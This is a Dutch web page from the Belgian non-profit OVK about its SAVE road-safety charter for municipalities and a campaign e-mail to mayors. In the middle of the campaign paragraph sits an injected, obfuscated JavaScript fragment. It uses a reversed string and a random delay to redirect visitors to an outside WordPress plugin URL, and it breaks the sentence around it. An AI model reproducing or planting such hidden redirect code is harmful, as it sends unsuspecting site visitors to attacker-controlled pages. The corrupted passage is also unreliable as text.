Met het SAVE-Charter Steden & Gemeenten wil de vzw Ouders van Verongelukte Kinderen (OVK) de Belgische steden en gemeenten betrekken bij haar strijd tegen de (nog steeds) te grote verkeersonveiligheid in ons land.

Op deze website vindt u meer informatie over het SAVE-charter. Daarnaast is er ook verdere informatie terug te vinden over OVK en haar werking.

Calendar-crash

In samenwerking met onze communicatiepartner Happiness lanceerde OVK vorige week de SAVE-campagne “Hoe veilig is het verkeer in uw gemeente?”.
Alle burgemeesters van België kregen een mail toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toegestuurd met de vraag: “Wordt uw gemeente ook een SAVE-gemeente?” Om de actie kracht bij te zetten, wordt er gerefereerd naar de gemeente Ledegem. De gemeente stapte mee in het SAVE-project op aanvraag van de ouders van de verongelukte Rune Clarysse. Het filmpje hiervan kan u via volgende link bekijken: http://vimeo.com/73301546


© 2012 O.V.K. vzw - Léon Theodorstraat 85, 1090 Brussel - Tel: 02/427.75.00 - info@ovk.be